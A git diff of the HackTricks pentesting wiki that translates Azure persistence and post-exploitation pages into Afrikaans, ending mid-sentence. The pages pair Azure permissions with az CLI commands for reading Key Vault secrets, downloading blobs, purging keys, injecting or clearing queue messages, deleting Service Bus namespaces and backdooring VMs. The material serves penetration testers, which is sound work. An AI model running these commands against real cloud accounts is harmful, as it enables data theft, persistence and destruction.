a/src/pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md b/src/pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md index 95dedb925..cfb25adae 100644 --- a/src/pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md +++ b/src/pentesting-cloud/azure-security/az-persistence/az-storage-persistence.md @@ -4,42 +4,34 @@ ## Storage Privesc -For more information about storage check: +Vir meer inligting oor berging, kyk: {{#ref}} ../az-services/az-storage.md {{#endref}} -### Common tricks +### Algemene truuks -- Keep the access keys -- Generate SAS - - User delegated are 7 days max +- Hou die toegang sleutels +- Genereer SAS +- Gebruiker gedelegeer is 7 dae maksimum ### Microsoft.Storage/storageAccounts/blobServices/containers/update && Microsoft.Storage/storageAccounts/blobServices/deletePolicy/write -These permissions allows the user to modify blob service properties for the container delete retention feature, which enables or configures the retention period for deleted containers. These permissions can be used for maintaining persistence to provide a window of opportunity for the attacker to recover or manipulate deleted containers that should have been permanently removed and accessing sensitive information. - +Hierdie toestemmings laat die gebruiker toe om blob diens eienskappe te wysig vir die houer verwydering retensie kenmerk, wat die retensie tydperk vir verwyderde houers aktiveer of konfigureer. Hierdie toestemmings kan gebruik word om volharding te handhaaf om 'n geleentheid te bied vir die aanvaller om verwyderde houers wat permanent verwyder moes gewees het, te herstel of te manipuleer en toegang tot sensitiewe inligting te verkry. ```bash az storage account blob-service-properties update \ - --account-name \ - --enable-container-delete-retention true \ - --container-delete-retention-days 100 +--account-name \ +--enable-container-delete-retention true \ +--container-delete-retention-days 100 ``` - ### Microsoft.Storage/storageAccounts/read && Microsoft.Storage/storageAccounts/listKeys/action -These permissions can lead to the attacker to modify the retention policies, restoring deleted data, and accessing sensitive information. - +Hierdie toestemmings kan die aanvaller in staat stel om die retensiebeleide te wysig, verwyderde data te herstel, en toegang tot sensitiewe inligting te verkry. ```bash az storage blob service-properties delete-policy update \ - --account-name \ - --enable true \ - --days-retained 100 +--account-name \ +--enable true \ +--days-retained 100 ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md b/src/pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md index 8d020a39e..8d052ad84 100644 --- a/src/pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md +++ b/src/pentesting-cloud/azure-security/az-persistence/az-vms-persistence.md @@ -1,29 +1,25 @@ -# Az - VMs Persistence +# Az - VMs Persistensie {{#include ../../../banners/hacktricks-training.md}} -## VMs persistence +## VMs persistensie -For more information about VMs check: +Vir meer inligting oor VMs, kyk: {{#ref}} ../az-services/vms/ {{#endref}} -### Backdoor VM applications, VM Extensions & Images +### Backdoor VM toepassings, VM Uitbreidings & Beelde -An attacker identifies applications, extensions or images being frequently used in the Azure account, he could insert his code in VM applications and extensions so every time they get installed the backdoor is executed. +'n Aanvaller identifiseer toepassings, uitbreidings of beelde wat gereeld in die Azure-rekening gebruik word, hy kan sy kode in VM-toepassings en uitbreidings invoeg sodat elke keer as hulle geïnstalleer word, die backdoor uitgevoer word. -### Backdoor Instances +### Backdoor Instansies -An attacker could get access to the instances and backdoor them: +'n Aanvaller kan toegang tot die instansies verkry en hulle backdoor: -- Using a traditional **rootkit** for example -- Adding a new **public SSH key** (check [EC2 privesc options](https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc)) -- Backdooring the **User Data** +- Deur 'n tradisionele **rootkit** te gebruik +- 'n Nuwe **publieke SSH-sleutel** by te voeg (kyk [EC2 privesc opsies](https://cloud.hacktricks.xyz/pentesting-cloud/aws-security/aws-privilege-escalation/aws-ec2-privesc)) +- Die **Gebruiker Data** te backdoor {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/README.md b/src/pentesting-cloud/azure-security/az-post-exploitation/README.md index 53b20671b..63088a93b 100644 --- a/src/pentesting-cloud/azure-security/az-post-exploitation/README.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/README.md @@ -1,6 +1 @@ # Az - Post Exploitation - - - - - diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md index 9c3d0b8c6..d7c76caad 100644 --- a/src/pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-blob-storage-post-exploitation.md @@ -4,7 +4,7 @@ ## Storage Privesc -For more information about storage check: +Vir meer inligting oor stoor, kyk: {{#ref}} ../az-services/az-storage.md @@ -12,38 +12,30 @@ For more information about storage check: ### Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read -A principal with this permission will be able to **list** the blobs (files) inside a container and **download** the files which might contain **sensitive information**. - +'n Hoofpersoon met hierdie toestemming sal in staat wees om **lys** van die blobs (lêers) binne 'n houer te maak en **af te laai** die lêers wat moontlik **sensitiewe inligting** kan bevat. ```bash # e.g. Microsoft.Storage/storageAccounts/blobServices/containers/blobs/read az storage blob list \ - --account-name \ - --container-name --auth-mode login +--account-name \ +--container-name --auth-mode login az storage blob download \ - --account-name \ - --container-name \ - -n file.txt --auth-mode login +--account-name \ +--container-name \ +-n file.txt --auth-mode login ``` - ### Microsoft.Storage/storageAccounts/blobServices/containers/blobs/write -A principal with this permission will be able to **write and overwrite files in containers** which might allow him to cause some damage or even escalate privileges (e.g. overwrite some code stored in a blob): - +'n Hoofpersoon met hierdie toestemming sal in staat wees om **lêers in houers te skryf en te oorskryf** wat hom mag toelaat om skade aan te rig of selfs bevoegdhede te verhoog (bv. om 'n bietjie kode wat in 'n blob gestoor is, te oorskryf): ```bash # e.g. Microsoft.Storage/storageAccounts/blobServices/containers/blobs/write az storage blob upload \ - --account-name \ - --container-name \ - --file /tmp/up.txt --auth-mode login --overwrite +--account-name \ +--container-name \ +--file /tmp/up.txt --auth-mode login --overwrite ``` - ### \*/delete -This would allow to delete objects inside the storage account which might **interrupt some services** or make the client **lose valuable information**. +Dit sal toelaat om voorwerpe binne die stoorrekening te verwyder wat dalk **sekere dienste kan onderbreek** of die kliënt kan **waardevolle inligting laat verloor**. {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md index b3d3cf90f..1f9364465 100644 --- a/src/pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md @@ -4,7 +4,7 @@ File Share Post Exploitation -For more information about file shares check: +Vir meer inligting oor lêer deel, kyk: {{#ref}} ../az-services/az-file-shares.md @@ -12,41 +12,33 @@ For more information about file shares check: ### Microsoft.Storage/storageAccounts/fileServices/fileshares/files/read -A principal with this permission will be able to **list** the files inside a file share and **download** the files which might contain **sensitive information**. - +'n Hoofpersoon met hierdie toestemming sal in staat wees om **lys** die lêers binne 'n lêer deel en **af te laai** die lêers wat **sensitiewe inligting** mag bevat. ```bash # List files inside an azure file share az storage file list \ - --account-name \ - --share-name \ - --auth-mode login --enable-file-backup-request-intent +--account-name \ +--share-name \ +--auth-mode login --enable-file-backup-request-intent # Download an specific file az storage file download \ - --account-name \ - --share-name \ - --path \ - --dest /path/to/down \ - --auth-mode login --enable-file-backup-request-intent +--account-name \ +--share-name \ +--path \ +--dest /path/to/down \ +--auth-mode login --enable-file-backup-request-intent ``` - ### Microsoft.Storage/storageAccounts/fileServices/fileshares/files/write, Microsoft.Storage/storageAccounts/fileServices/writeFileBackupSemantics/action -A principal with this permission will be able to **write and overwrite files in file shares** which might allow him to cause some damage or even escalate privileges (e.g. overwrite some code stored in a file share): - +'n Hoofpersoon met hierdie toestemming sal in staat wees om **lêers in lêerdelings te skryf en te oorskryf** wat hom mag toelaat om skade aan te rig of selfs bevoegdhede te verhoog (bv. om 'n bietjie kode wat in 'n lêerdeling gestoor is, te oorskryf): ```bash az storage blob upload \ - --account-name \ - --container-name \ - --file /tmp/up.txt --auth-mode login --overwrite +--account-name \ +--container-name \ +--file /tmp/up.txt --auth-mode login --overwrite ``` - ### \*/delete -This would allow to delete file inside the shared filesystem which might **interrupt some services** or make the client **lose valuable information**. +Dit sal toelaat om lêers binne die gedeelde lêerstelsel te verwyder wat dalk **sekere dienste kan onderbreek** of die kliënt **waardevolle inligting kan laat verloor**. {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md index e511ad994..3fbd3fd98 100644 --- a/src/pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-function-apps-post-exploitation.md @@ -4,18 +4,14 @@ ## Funciton Apps Post Exploitaiton -For more information about function apps check: +Vir meer inligting oor funksie-apps, kyk: {{#ref}} ../az-services/az-function-apps.md {{#endref}} -> [!CAUTION] > **Function Apps post exploitation tricks are very related to the privilege escalation tricks** so you can find all of them there: +> [!CAUTION] > **Funksie-apps post eksploitatie truuks is baie verwant aan die privilige-eskalasie truuks** so jy kan al hulle daar vind: {{#ref}} ../az-privilege-escalation/az-functions-app-privesc.md {{#endref}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md index d9357b643..187d60238 100644 --- a/src/pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md @@ -4,7 +4,7 @@ ## Azure Key Vault -For more information about this service check: +Vir meer inligting oor hierdie diens, kyk: {{#ref}} ../az-services/keyvault.md @@ -12,27 +12,22 @@ For more information about this service check: ### Microsoft.KeyVault/vaults/secrets/getSecret/action -This permission will allow a principal to read the secret value of secrets: - +Hierdie toestemming sal 'n hoofpersoon toelaat om die geheime waarde van geheime te lees: ```bash az keyvault secret show --vault-name --name # Get old version secret value az keyvault secret show --id https://.vault.azure.net/secrets// ``` - ### **Microsoft.KeyVault/vaults/certificates/purge/action** -This permission allows a principal to permanently delete a certificate from the vault. - +Hierdie toestemming laat 'n hoofpersoon toe om 'n sertifikaat permanent uit die kluis te verwyder. ```bash az keyvault certificate purge --vault-name --name ``` - ### **Microsoft.KeyVault/vaults/keys/encrypt/action** -This permission allows a principal to encrypt data using a key stored in the vault. - +Hierdie toestemming laat 'n hoofpersoon toe om data te enkripteer met 'n sleutel wat in die kluis gestoor is. ```bash az keyvault key encrypt --vault-name --name --algorithm --value @@ -40,76 +35,55 @@ az keyvault key encrypt --vault-name --name --algorithm echo "HackTricks" | base64 # SGFja1RyaWNrcwo= az keyvault key encrypt --vault-name testing-1231234 --name testing --algorithm RSA-OAEP-256 --value SGFja1RyaWNrcwo= ``` - ### **Microsoft.KeyVault/vaults/keys/decrypt/action** -This permission allows a principal to decrypt data using a key stored in the vault. - +Hierdie toestemming laat 'n hoofpersoon toe om data te ontsleutel met 'n sleutel wat in die kluis gestoor is. ```bash az keyvault key decrypt --vault-name --name --algorithm --value # Example az keyvault key decrypt --vault-name testing-1231234 --name testing --algorithm RSA-OAEP-256 --value "ISZ+7dNcDJXLPR5MkdjNvGbtYK3a6Rg0ph/+3g1IoUrCwXnF791xSF0O4rcdVyyBnKRu0cbucqQ/+0fk2QyAZP/aWo/gaxUH55pubS8Zjyw/tBhC5BRJiCtFX4tzUtgTjg8lv3S4SXpYUPxev9t/9UwUixUlJoqu0BgQoXQhyhP7PfgAGsxayyqxQ8EMdkx9DIR/t9jSjv+6q8GW9NFQjOh70FCjEOpYKy9pEGdLtPTrirp3fZXgkYfIIV77TXuHHdR9Z9GG/6ge7xc9XT6X9ciE7nIXNMQGGVCcu3JAn9BZolb3uL7PBCEq+k2rH4tY0jwkxinM45tg38Re2D6CEA==" # This is the result from the previous encryption ``` - ### **Microsoft.KeyVault/vaults/keys/purge/action** -This permission allows a principal to permanently delete a key from the vault. - +Hierdie toestemming laat 'n hoofpersoon toe om 'n sleutel permanent uit die kluis te verwyder. ```bash az keyvault key purge --vault-name --name ``` - ### **Microsoft.KeyVault/vaults/secrets/purge/action** -This permission allows a principal to permanently delete a secret from the vault. - +Hierdie toestemming laat 'n prinsiep toe om 'n geheim permanent uit die kluis te verwyder. ```bash az keyvault secret purge --vault-name --name ``` - ### **Microsoft.KeyVault/vaults/secrets/setSecret/action** -This permission allows a principal to create or update a secret in the vault. - +Hierdie toestemming laat 'n hoofpersoon toe om 'n geheim in die kluis te skep of op te dateer. ```bash az keyvault secret set --vault-name --name --value ``` - ### **Microsoft.KeyVault/vaults/certificates/delete** -This permission allows a principal to delete a certificate from the vault. The certificate is moved to the "soft-delete" state, where it can be recovered unless purged. - +Hierdie toestemming laat 'n prinsiep toe om 'n sertifikaat uit die kluis te verwyder. Die sertifikaat word na die "sagte-verwyder" toestand verskuif, waar dit herstel kan word tensy dit verwyder word. ```bash az keyvault certificate delete --vault-name --name ``` - ### **Microsoft.KeyVault/vaults/keys/delete** -This permission allows a principal to delete a key from the vault. The key is moved to the "soft-delete" state, where it can be recovered unless purged. - +Hierdie toestemming laat 'n hoofpersoon toe om 'n sleutel uit die kluis te verwyder. Die sleutel word na die "sagte-verwyder" toestand verskuif, waar dit herstel kan word tensy dit verwyder word. ```bash az keyvault key delete --vault-name --name ``` - ### **Microsoft.KeyVault/vaults/secrets/delete** -This permission allows a principal to delete a secret from the vault. The secret is moved to the "soft-delete" state, where it can be recovered unless purged. - +Hierdie toestemming laat 'n hoofpersoon toe om 'n geheim uit die kluis te verwyder. Die geheim word na die "sagte-verwyder" toestand verskuif, waar dit herstel kan word tensy dit verwyder word. ```bash az keyvault secret delete --vault-name --name ``` - ### Microsoft.KeyVault/vaults/secrets/restore/action -This permission allows a principal to restore a secret from a backup. - +Hierdie toestemming laat 'n prinsiep toe om 'n geheim uit 'n rugsteun te herstel. ```bash az keyvault secret restore --vault-name --file ``` - {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md index 03c59a8d5..a8c681ce6 100644 --- a/src/pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md @@ -4,7 +4,7 @@ ## Queue -For more information check: +Vir meer inligting, kyk: {{#ref}} ../az-services/az-queue-enum.md @@ -12,66 +12,53 @@ For more information check: ### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/read` -An attacker with this permission can peek messages from an Azure Storage Queue. This allows the attacker to view the content of messages without marking them as processed or altering their state. This could lead to unauthorized access to sensitive information, enabling data exfiltration or gathering intelligence for further attacks. - +'n Aanvaller met hierdie toestemming kan boodskappe van 'n Azure Storage Queue afkyk. Dit stel die aanvaller in staat om die inhoud van boodskappe te sien sonder om dit as verwerk te merk of hul toestand te verander. Dit kan lei tot ongemagtigde toegang tot sensitiewe inligting, wat data-exfiltrasie of die versameling van intelligensie vir verdere aanvalle moontlik maak. ```bash az storage message peek --queue-name --account-name ``` - -**Potential Impact**: Unauthorized access to the queue, message exposure, or queue manipulation by unauthorized users or services. +**Potensiële Impak**: Onbevoegde toegang tot die tou, boodskapblootstelling, of tou-manipulasie deur onbevoegde gebruikers of dienste. ### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/process/action` -With this permission, an attacker can retrieve and process messages from an Azure Storage Queue. This means they can read the message content and mark it as processed, effectively hiding it from legitimate systems. This could lead to sensitive data being exposed, disruptions in how messages are handled, or even stopping important workflows by making messages unavailable to their intended users. - +Met hierdie toestemming kan 'n aanvaller boodskappe van 'n Azure Storage Queue onttrek en verwerk. Dit beteken hulle kan die boodskapinhoud lees en dit as verwerk merk, wat dit effektief verberg van wettige stelsels. Dit kan lei tot die blootstelling van sensitiewe data, onderbrekings in hoe boodskappe hanteer word, of selfs die stop van belangrike werksvloei deur boodskappe onbeskikbaar te maak vir hul beoogde gebruikers. ```bash az storage message get --queue-name --account-name ``` - ### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/add/action` -With this permission, an attacker can add new messages to an Azure Storage Queue. This allows them to inject malicious or unauthorized data into the queue, potentially triggering unintended actions or disrupting downstream services that process the messages. - +Met hierdie toestemming kan 'n aanvaller nuwe boodskappe by 'n Azure Storage Queue voeg. Dit stel hulle in staat om kwaadwillige of nie-geautoriseerde data in die queue in te voeg, wat moontlik onbedoelde aksies kan ontketen of afgeleide dienste wat die boodskappe verwerk, kan ontwrig. ```bash az storage message put --queue-name --content "Injected malicious message" --account-name ``` - ### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/write` -This permission allows an attacker to add new messages or update existing ones in an Azure Storage Queue. By using this, they could insert harmful content or alter existing messages, potentially misleading applications or causing undesired behaviors in systems that rely on the queue. - +Hierdie toestemming laat 'n aanvaller toe om nuwe boodskappe by te voeg of bestaande te werk in 'n Azure Storage Queue. Deur dit te gebruik, kan hulle skadelike inhoud invoeg of bestaande boodskappe verander, wat moontlik toepassings kan mislei of ongewenste gedrag in stelsels wat op die queue staatmaak, kan veroorsaak. ```bash az storage message put --queue-name --content "Injected malicious message" --account-name #Update the message az storage message update --queue-name \ - --id \ - --pop-receipt \ - --content "Updated message content" \ - --visibility-timeout \ - --account-name +--id \ +--pop-receipt \ +--content "Updated message content" \ +--visibility-timeout \ +--account-name ``` - ### Actions: `Microsoft.Storage/storageAccounts/queueServices/queues/delete` -This permission allows an attacker to delete queues within the storage account. By leveraging this capability, an attacker can permanently remove queues and all their associated messages, causing significant disruption to workflows and resulting in critical data loss for applications that rely on the affected queues. This action can also be used to sabotage services by removing essential components of the system. - +Hierdie toestemming laat 'n aanvaller toe om rye binne die stoorrekening te verwyder. Deur hierdie vermoë te benut, kan 'n aanvaller rye permanent verwyder en al hul geassosieerde boodskappe, wat groot ontwrigting aan werkvloei veroorsaak en lei tot kritieke dataverlies vir toepassings wat op die geraakte rye staatmaak. Hierdie aksie kan ook gebruik word om dienste te saboteer deur noodsaaklike komponente van die stelsel te verwyder. ```bash az storage queue delete --name --account-name ``` - ### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/delete` -With this permission, an attacker can clear all messages from an Azure Storage Queue. This action removes all messages, disrupting workflows and causing data loss for systems dependent on the queue. - +Met hierdie toestemming kan 'n aanvaller alle boodskappe uit 'n Azure Storage Queue verwyder. Hierdie aksie verwyder alle boodskappe, wat werkvloei onderbreek en dataverlies veroorsaak vir stelsels wat van die queue afhanklik is. ```bash az storage message clear --queue-name --account-name ``` - ### Actions: `Microsoft.Storage/storageAccounts/queueServices/queues/write` -This permission allows an attacker to create or modify queues and their properties within the storage account. It can be used to create unauthorized queues, modify metadata, or change access control lists (ACLs) to grant or restrict access. This capability could disrupt workflows, inject malicious data, exfiltrate sensitive information, or manipulate queue settings to enable further attacks. - +Hierdie toestemming laat 'n aanvaller toe om rye en hul eienskappe binne die stoorrekening te skep of te wysig. Dit kan gebruik word om ongeoorloofde rye te skep, metadata te wysig, of toegangbeheerlyste (ACL's) te verander om toegang toe te laat of te beperk. Hierdie vermoë kan werksvloei onderbreek, kwaadwillige data inspuit, sensitiewe inligting eksfiltreer, of ryinstellings manipuleer om verdere aanvalle moontlik te maak. ```bash az storage queue create --name --account-name @@ -79,15 +66,10 @@ az storage queue metadata update --name --metadata key1=value1 key2 az storage queue policy set --name --permissions rwd --expiry 2024-12-31T23:59:59Z --account-name ``` - -## References +## Verwysings - https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues - https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api - https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md index 2fdb2dc55..719a33106 100644 --- a/src/pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md @@ -4,89 +4,73 @@ ## Service Bus -For more information check: +Vir meer inligting, kyk: {{#ref}} ../az-services/az-servicebus-enum.md {{#endref}} -### Actions: `Microsoft.ServiceBus/namespaces/Delete` - -An attacker with this permission can delete an entire Azure Service Bus namespace. This action removes the namespace and all associated resources, including queues, topics, subscriptions, and their messages, causing widespread disruption and permanent data loss across all dependent systems and workflows. +### Aksies: `Microsoft.ServiceBus/namespaces/Delete` +'n Aanvaller met hierdie toestemming kan 'n hele Azure Service Bus-namespace verwyder. Hierdie aksie verwyder die namespace en al die geassosieerde hulpbronne, insluitend rye, onderwerpe, intekeninge, en hul boodskappe, wat wye ontwrigting en permanente dataverlies oor alle afhanklike stelsels en werksvloei veroorsaak. ```bash az servicebus namespace delete --resource-group --name ``` - ### Actions: `Microsoft.ServiceBus/namespaces/topics/Delete` -An attacker with this permission can delete an Azure Service Bus topic. This action removes the topic and all its associated subscriptions and messages, potentially causing loss of critical data and disrupting systems and workflows relying on the topic. - +'n Aanvaller met hierdie toestemming kan 'n Azure Service Bus onderwerp verwyder. Hierdie aksie verwyder die onderwerp en al sy geassosieerde intekeninge en boodskappe, wat moontlik die verlies van kritieke data kan veroorsaak en stelsels en werksvloei wat op die onderwerp staatmaak, kan ontwrig. ```bash az servicebus topic delete --resource-group --namespace-name --name ``` - ### Actions: `Microsoft.ServiceBus/namespaces/queues/Delete` -An attacker with this permission can delete an Azure Service Bus queue. This action removes the queue and all the messages within it, potentially causing loss of critical data and disrupting systems and workflows dependent on the queue. - +'n Aanvaller met hierdie toestemming kan 'n Azure Service Bus-rye verwyder. Hierdie aksie verwyder die ry en al die boodskappe daarin, wat moontlik die verlies van kritieke data kan veroorsaak en stelsels en werksvloei wat van die ry afhanklik is, kan ontwrig. ```bash az servicebus queue delete --resource-group --namespace-name --name ``` - ### Actions: `Microsoft.ServiceBus/namespaces/topics/subscriptions/Delete` -An attacker with this permission can delete an Azure Service Bus subscription. This action removes the subscription and all its associated messages, potentially disrupting workflows, data processing, and system operations relying on the subscription. - +'n Aanvaller met hierdie toestemming kan 'n Azure Service Bus-subskripsie verwyder. Hierdie aksie verwyder die subskripsie en al sy geassosieerde boodskappe, wat moontlik werksvloei, dataverwerking en stelsels se bedrywighede wat op die subskripsie staatmaak, kan ontwrig. ```bash az servicebus topic subscription delete --resource-group --namespace-name --topic-name --name ``` - ### Actions: `Microsoft.ServiceBus/namespaces/write` & `Microsoft.ServiceBus/namespaces/read` -An attacker with permissions to create or modify Azure Service Bus namespaces can exploit this to disrupt operations, deploy unauthorized resources, or expose sensitive data. They can alter critical configurations such as enabling public network access, downgrading encryption settings, or changing SKUs to degrade performance or increase costs. Additionally, they could disable local authentication, manipulate replica locations, or adjust TLS versions to weaken security controls, making namespace misconfiguration a significant post-exploitation risk. - +'n Aanvaller met toestemmings om Azure Service Bus-namespaces te skep of te wysig, kan dit gebruik om bedrywighede te ontwrig, ongeoorloofde hulpbronne te ontplooi of sensitiewe data bloot te stel. Hulle kan kritieke konfigurasies verander, soos om publieke netwerktoegang in te skakel, versleutelinginstellings te verlaag, of SKUs te verander om prestasie te verlaag of koste te verhoog. Daarbenewens kan hulle plaaslike verifikasie deaktiveer, replika-lokasies manipuleer, of TLS-weergawes aanpas om sekuriteitsbeheer te verswak, wat namespace-misconfigurasie 'n beduidende post-exploitation risiko maak. ```bash az servicebus namespace create --resource-group --name --location az servicebus namespace update --resource-group --name --tags ``` - ### Actions: `Microsoft.ServiceBus/namespaces/queues/write` (`Microsoft.ServiceBus/namespaces/queues/read`) -An attacker with permissions to create or modify Azure Service Bus queues (to modiffy the queue you will also need the Action:`Microsoft.ServiceBus/namespaces/queues/read`) can exploit this to intercept data, disrupt workflows, or enable unauthorized access. They can alter critical configurations such as forwarding messages to malicious endpoints, adjusting message TTL to retain or delete data improperly, or enabling dead-lettering to interfere with error handling. Additionally, they could manipulate queue sizes, lock durations, or statuses to disrupt service functionality or evade detection, making this a significant post-exploitation risk. - +'n Aanvaller met toestemmings om Azure Service Bus-rye te skep of te wysig (om die ry te wysig, sal jy ook die Aksie:`Microsoft.ServiceBus/namespaces/queues/read` benodig) kan dit benut om data te onderskep, werksvloei te ontwrig, of ongeoorloofde toegang te verkry. Hulle kan kritieke konfigurasies verander, soos om boodskappe na kwaadwillige eindpunte te stuur, boodskap TTL aan te pas om data onregmatig te behou of te verwyder, of om doodbriefing in te stel om met fouthantering te bemoei. Daarbenewens kan hulle ry-grootte, vergrendelingsduur of statusse manipuleer om diensfunksionaliteit te ontwrig of om opsporing te ontduik, wat dit 'n beduidende post-exploitatie risiko maak. ```bash az servicebus queue create --resource-group --namespace-name --name az servicebus queue update --resource-group --namespace-name --name ``` - ### Actions: `Microsoft.ServiceBus/namespaces/topics/write` (`Microsoft.ServiceBus/namespaces/topics/read`) -An attacker with permissions to create or modify topics (to modiffy the topic you will also need the Action:`Microsoft.ServiceBus/namespaces/topics/read`) within an Azure Service Bus namespace can exploit this to disrupt message workflows, expose sensitive data, or enable unauthorized actions. Using commands like az servicebus topic update, they can manipulate configurations such as enabling partitioning for scalability misuse, altering TTL settings to retain or discard messages improperly, or disabling duplicate detection to bypass controls. Additionally, they could adjust topic size limits, change status to disrupt availability, or configure express topics to temporarily store intercepted messages, making topic management a critical focus for post-exploitation mitigation. - +'n Aanvaller met toestemmings om onderwerpe te skep of te wysig (om die onderwerp te wysig, sal jy ook die Aksie:`Microsoft.ServiceBus/namespaces/topics/read` benodig) binne 'n Azure Service Bus-namespace kan dit gebruik om boodskapwerkvloei te ontwrig, sensitiewe data bloot te stel, of ongeoorloofde aksies moontlik te maak. Deur opdragte soos az servicebus topic update te gebruik, kan hulle konfigurasies manipuleer soos om partitionering vir skaalbaarheid misbruik in te stel, TTL-instellings te verander om boodskappe onregmatig te behou of te verwerp, of om duplikaatdetectie te deaktiveer om kontroles te omseil. Daarbenewens kan hulle onderwerp groottegrense aanpas, status verander om beskikbaarheid te ontwrig, of ekspressonderwerpe konfigureer om tydelik onderskepte boodskappe te stoor, wat onderwerpbestuur 'n kritieke fokus maak vir post-exploitatie-mitigering. ```bash az servicebus topic create --resource-group --namespace-name --name az servicebus topic update --resource-group --namespace-name --name ``` - ### Actions: `Microsoft.ServiceBus/namespaces/topics/subscriptions/write` (`Microsoft.ServiceBus/namespaces/topics/subscriptions/read`) -An attacker with permissions to create or modify subscriptions (to modiffy the subscription you will also need the Action: `Microsoft.ServiceBus/namespaces/topics/subscriptions/read`) within an Azure Service Bus topic can exploit this to intercept, reroute, or disrupt message workflows. Using commands like az servicebus topic subscription update, they can manipulate configurations such as enabling dead lettering to divert messages, forwarding messages to unauthorized endpoints, or modifying TTL and lock duration to retain or interfere with message delivery. Additionally, they can alter status or max delivery count settings to disrupt operations or evade detection, making subscription control a critical aspect of post-exploitation scenarios. - +'n Aanvaller met toestemmings om subskripsies te skep of te wysig (om die subskripsie te wysig, sal jy ook die Aksie: `Microsoft.ServiceBus/namespaces/topics/subscriptions/read` benodig) binne 'n Azure Service Bus onderwerp kan dit gebruik om boodskapwerkvloei te onderskep, om te lei of te ontwrig. Deur opdragte soos az servicebus topic subscription update te gebruik, kan hulle konfigurasies manipuleer soos om doodbriefing in te skakel om boodskappe te lei, boodskappe na nie-geautoriseerde eindpunte te stuur, of TTL en vergrendelingsduur te wysig om boodskapaflewering te behou of te beïnvloed. Daarbenewens kan hulle status of maksimum afleweringsgetal instellings verander om bedrywighede te ontwrig of opsporing te vermy, wat subskripsiebeheer 'n kritieke aspek van post-exploitasiestelsels maak. ```bash az servicebus topic subscription create --resource-group --namespace-name --topic-name --name az servicebus topic subscription update --resource-group --namespace-name --topic-name --name ``` +### Aksies: `AuthorizationRules` Stuur & Ontvang Berigte -### Actions: `AuthorizationRules` Send & Recive Messages - -Take a look here: +Kyk hier: {{#ref}} ../az-privilege-escalation/az-queue-privesc.md {{#endref}} -## References +## Verwysings - https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues - https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api @@ -97,7 +81,3 @@ Take a look here: - https://learn.microsoft.com/en-us/cli/azure/servicebus/queue?view=azure-cli-latest {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.md b/src/pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.md index 7a8b1c1d5..649ebf0fd 100644 --- a/src/pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.md +++ b/src/pentesting-cloud/azure-security/az-post-exploitation/az-sql-post-exploitation.md @@ -1,10 +1,10 @@ -# Az - SQL Database Post Exploitation +# Az - SQL Databasis Post Exploitatie {{#include ../../../banners/hacktricks-training.md}} -## SQL Database Post Exploitation +## SQL Databasis Post Exploitatie -For more information about SQL Database check: +Vir meer inligting oor SQL Databasis, kyk: {{#ref}} ../az-services/az-sql.md @@ -12,8 +12,7 @@ For more information about SQL Database check: ### "Microsoft.Sql/servers/databases/read", "Microsoft.Sql/servers/read" && "Microsoft.Sql/servers/databases/write" -With these permissions, an attacker can create and update databases within the compromised environment. This 